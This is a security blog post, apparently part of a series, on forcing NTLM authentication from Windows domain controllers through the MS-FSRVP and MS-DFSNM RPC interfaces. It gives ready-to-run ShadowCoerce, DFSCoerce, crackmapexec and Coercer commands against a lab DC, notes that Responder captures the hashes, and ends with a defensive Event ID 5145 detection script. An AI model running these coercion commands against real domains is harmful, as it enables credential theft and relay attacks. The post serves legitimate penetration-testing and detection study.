Coerce | Part II



Hello again everyone! As promised, we continue with the Coerce saga, and in this second part we go on to cover other vulnerable RPCs:

MS-FSRVP

MS-FSRVP is the Remote Procedure Call related to the File Server Remote VSS Protocol. It is used to create shadow copies of file shares on a remote computer, making it easier for backup applications to perform application-consistent backups and to restore data to SMB2 shares.

It should be noted that in order to exploit this vulnerability, the server must have the “File Server VSS Agent Service” feature enabled. 



It should be noted that Microsoft released two security patches correcting this on June 14, 2022.

Verification

As in the case of MS-RPRN, we use impacket's rpcdump to check whether the MS-FSRVP RPC is enabled:

python3 rpcdump.py @dc.corp.lab | grep 'MS-FSRVP'


It should be noted that there are more methods to check if said RPC is enabled using other tools and techniques.

Exploitation

After verifying that the RPC called “MS-FSRVP” is enabled on the victim, and having compromised a domain user through other means, it is exploited with a PoC called ShadowCoerce, which has been assigned the CVE identifier CVE-2022-30154.

Likewise, to verify that authentication is coerced correctly, we use the user “bob”, with limited privileges, in the domain “dc.corp.lab”.

python shadowcoerce.py -d "CORP" -u "bob" -p "" attack_machine dc.corp.lab


The capture of the NetNTLM hash can be seen in the Responder tool.


MS-DFSNM


MS-DFSNM is the Remote Procedure Call related to the Distributed File System (DFS): Namespace Management Protocol. It provides an RPC interface for managing DFS configurations.


Verification

As in the case of MS-EFSR, we use the crackmapexec tool with its “dfscoerce” module to check whether or not the server is vulnerable, but this time authenticating as the previously compromised domain user “bob”, who has limited privileges, against “dc.corp.lab”:

crackmapexec smb dc.corp.lab -d "corp.lab" -u "bob" -p "" -M dfscoerce


It should be noted that there are more methods to check if said RPC is enabled using other tools and techniques.

Exploitation

After verifying that the domain controller is vulnerable, it is exploited with a PoC called DFSCoerce, which was published in June 2022.

Likewise, to verify that authentication is coerced correctly, we use the user “bob”, with limited privileges, in the domain “dc.corp.lab”.

python3 dfscoerce.py -d "CORP" -u "bob" -p "" attack_machine dc.corp.lab


The capture of the NetNTLM hash can be seen in the Responder tool.



All for one and one for all


Coercer is a tool written in Python that tests multiple methods of coercing authentication, including all of those described above.

It has three execution modes: scan, coerce and fuzz. An example of running it in scan mode:

coercer scan -t dc.corp.lab -u "bob" -p "" -d "CORP.LAB"


An example of running it in coerce mode:

coercer coerce -l attack_machine -t dc.corp.lab -u "bob" -p "" -d "CORP.LAB"
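A defender-side counterpart to the tools above, added here as an example and not part of the original post or of any of those projects: it scans Windows Security Event ID 5145 records (Detailed File Share auditing) for user accounts opening the named pipes that expose the coercion RPCs covered in this series. It assumes that auditing is enabled on the domain controller and that the interfaces sit behind their usual pipes (FssagentRpc, netdfs, spoolss, efsrpc/lsarpc); the sample events are constructed.

```python
import re

# Named pipes exposing the RPC interfaces from this post (and from Part I).
COERCION_PIPES = {
    "fssagentrpc": "MS-FSRVP",
    "netdfs": "MS-DFSNM",
    "spoolss": "MS-RPRN",
    "efsrpc": "MS-EFSR",
    "lsarpc": "MS-EFSR",
}

def _pipe_name(relative_target):
    # Event 5145 records either "netdfs" or "\PIPE\netdfs"; normalise both.
    return re.sub(r"^\\?pipe\\", "", relative_target.strip(), flags=re.I).lower()

def find_coercion_candidates(events):
    """Return (SubjectUserName, IpAddress, RPC) for each Event ID 5145 record
    where a user account opened one of the coercion pipes over IPC$.
    Machine accounts (ending in '$') are skipped because servers legitimately
    use some of these pipes among themselves; tune that to your environment."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 5145 or not ev.get("ShareName", "").upper().endswith("IPC$"):
            continue
        rpc = COERCION_PIPES.get(_pipe_name(ev.get("RelativeTargetName", "")))
        if rpc is None or ev.get("SubjectUserName", "").endswith("$"):
            continue
        hits.append((ev["SubjectUserName"], ev["IpAddress"], rpc))
    return hits

# Constructed sample events (not real log data), with the 5145 fields we use.
SAMPLE_EVENTS = [
    {"EventID": 5145, "SubjectUserName": "bob", "IpAddress": "10.0.0.50",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "FssagentRpc"},
    {"EventID": 5145, "SubjectUserName": "bob", "IpAddress": "10.0.0.50",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": r"\PIPE\netdfs"},
    {"EventID": 5145, "SubjectUserName": "FS01$", "IpAddress": "10.0.0.20",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "netdfs"},
    {"EventID": 5145, "SubjectUserName": "alice", "IpAddress": "10.0.0.51",
     "ShareName": r"\\*\Data", "RelativeTargetName": "report.docx"},
]

if __name__ == "__main__":
    for user, ip, rpc in find_coercion_candidates(SAMPLE_EVENTS):
        print(f"{user}@{ip} opened the {rpc} pipe")
```

In a real deployment the same logic runs over events exported from the DC (for example with Get-WinEvent) and the low-privileged user hitting FssagentRpc or netdfs from a workstation is the signal to chase.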


Cheat Sheet 



